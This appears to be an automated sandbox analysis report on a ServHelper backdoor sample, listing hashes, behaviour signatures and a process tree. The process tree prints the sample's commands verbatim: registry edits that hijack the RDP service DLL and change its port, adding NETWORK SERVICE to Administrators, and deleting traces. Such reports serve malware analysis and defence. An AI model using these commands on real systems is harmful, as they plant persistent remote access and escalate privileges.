Analysis
-
max time kernel
146s -
max time network
157s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
26-09-2021 14:52
Static task
static1
Behavioral task
behavioral1
Sample
748b112881047820f530c202bb59488e.exe
Resource
win7v20210408
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
748b112881047820f530c202bb59488e.exe
Resource
win10-en-20210920
0 signatures
0 seconds
General
-
Target
748b112881047820f530c202bb59488e.exe
-
Size
4.0MB
-
MD5
748b112881047820f530c202bb59488e
-
SHA1
edf77f969bf54a47b21e6179cbcabb4651706d7c
-
SHA256
82285ac0988c68f9b9ecc7649cb9c6a3f3ecb242dd198465dbd4236d7fa6a59c
-
SHA512
252640d935ce3c7885fa48496b1b9c405f5dc9e719eda9c965d5fec46f877c00a7d96b14acf7410fbef9dbbfa9723932b54cdc75084fdd54e492eaa8d6f37ad6
Score
10/10
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1164 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 3680 powershell.exe 3680 powershell.exe 3680 powershell.exe 3784 powershell.exe 3784 powershell.exe 3784 powershell.exe 1044 powershell.exe 1044 powershell.exe 1044 powershell.exe 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 624 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3188 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeDebugPrivilege 3784 powershell.exe Token: SeDebugPrivilege 1044 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 1840 wrote to memory of 3188 1840 748b112881047820f530c202bb59488e.exe 71 PID 1840 wrote to memory of 3188 1840 748b112881047820f530c202bb59488e.exe 71 PID 1840 wrote to memory of 3188 1840 748b112881047820f530c202bb59488e.exe 71 PID 3188 wrote to memory of 648 3188 powershell.exe 73 PID 3188 wrote to memory of 648 3188 powershell.exe 73 PID 3188 wrote to memory of 648 3188 powershell.exe 73 PID 648 wrote to memory of 940 648 csc.exe 74 PID 648 wrote to memory of 940 648 csc.exe 74 PID 648 wrote to memory of 940 648 csc.exe 74 PID 3188 wrote to memory of 3680 3188 powershell.exe 75 PID 3188 wrote to memory of 3680 3188 powershell.exe 75 PID 3188 wrote to memory of 3680 3188 powershell.exe 75 PID 3188 wrote to memory of 3784 3188 powershell.exe 77 PID 3188 wrote to memory of 3784 3188 powershell.exe 77 PID 3188 wrote to memory of 3784 3188 powershell.exe 77 PID 3188 wrote to memory of 1044 3188 powershell.exe 79 PID 3188 wrote to memory of 1044 3188 powershell.exe 79 PID 3188 wrote to memory of 1044 3188 powershell.exe 79 PID 3188 wrote to memory of 3980 3188 powershell.exe 81 PID 3188 wrote to memory of 3980 3188 powershell.exe 81 PID 3188 wrote to memory of 3980 3188 powershell.exe 81 PID 3188 wrote to memory of 1164 3188 powershell.exe 82 PID 3188 wrote to memory of 1164 3188 powershell.exe 82 PID 3188 wrote to memory of 1164 3188 powershell.exe 82 PID 3188 wrote to memory of 1812 3188 powershell.exe 83 PID 3188 wrote to memory of 1812 3188 powershell.exe 83 PID 3188 wrote to memory of 1812 3188 powershell.exe 83 PID 3188 wrote to memory of 2040 3188 powershell.exe 84 PID 3188 wrote to memory of 2040 3188 powershell.exe 84 PID 3188 wrote to memory of 2040 3188 powershell.exe 84 PID 2040 wrote to memory of 864 2040 net.exe 85 PID 2040 wrote to memory of 864 2040 net.exe 85 PID 2040 wrote to memory of 864 2040 net.exe 85 PID 3188 wrote to memory of 1428 3188 powershell.exe 86 PID 3188 wrote to memory of 1428 3188 powershell.exe 86 PID 3188 wrote to memory of 1428 3188 powershell.exe 86 PID 1428 wrote to memory of 640 1428 cmd.exe 87 PID 1428 wrote to memory of 640 1428 cmd.exe 87 PID 1428 wrote to memory of 640 1428 cmd.exe 87 PID 640 wrote to memory of 3112 640 cmd.exe 88 PID 640 wrote to memory of 3112 640 cmd.exe 88 PID 640 wrote to memory of 3112 640 cmd.exe 88 PID 3112 wrote to memory of 2356 3112 net.exe 89 PID 3112 wrote to memory of 2356 3112 net.exe 89 PID 3112 wrote to memory of 2356 3112 net.exe 89 PID 3188 wrote to memory of 656 3188 powershell.exe 90 PID 3188 wrote to memory of 656 3188 powershell.exe 90 PID 3188 wrote to memory of 656 3188 powershell.exe 90 PID 656 wrote to memory of 3292 656 cmd.exe 91 PID 656 wrote to memory of 3292 656 cmd.exe 91 PID 656 wrote to memory of 3292 656 cmd.exe 91 PID 3292 wrote to memory of 3160 3292 cmd.exe 92 PID 3292 wrote to memory of 3160 3292 cmd.exe 92 PID 3292 wrote to memory of 3160 3292 cmd.exe 92 PID 3160 wrote to memory of 3508 3160 net.exe 93 PID 3160 wrote to memory of 3508 3160 net.exe 93 PID 3160 wrote to memory of 3508 3160 net.exe 93 PID 3188 wrote to memory of 3680 3188 powershell.exe 97 PID 3188 wrote to memory of 3680 3188 powershell.exe 97 PID 3188 wrote to memory of 3680 3188 powershell.exe 97 PID 3188 wrote to memory of 3712 3188 powershell.exe 98 PID 3188 wrote to memory of 3712 3188 powershell.exe 98 PID 3188 wrote to memory of 3712 3188 powershell.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe"C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zea4ipco\zea4ipco.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14A2.tmp" "c:\Users\Admin\AppData\Local\Temp\zea4ipco\CSC3DC7E20752B24731AA2DA089C7149AA5.TMP"4⤵PID:940
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1812
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2356
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3508
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3680
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3712
-
-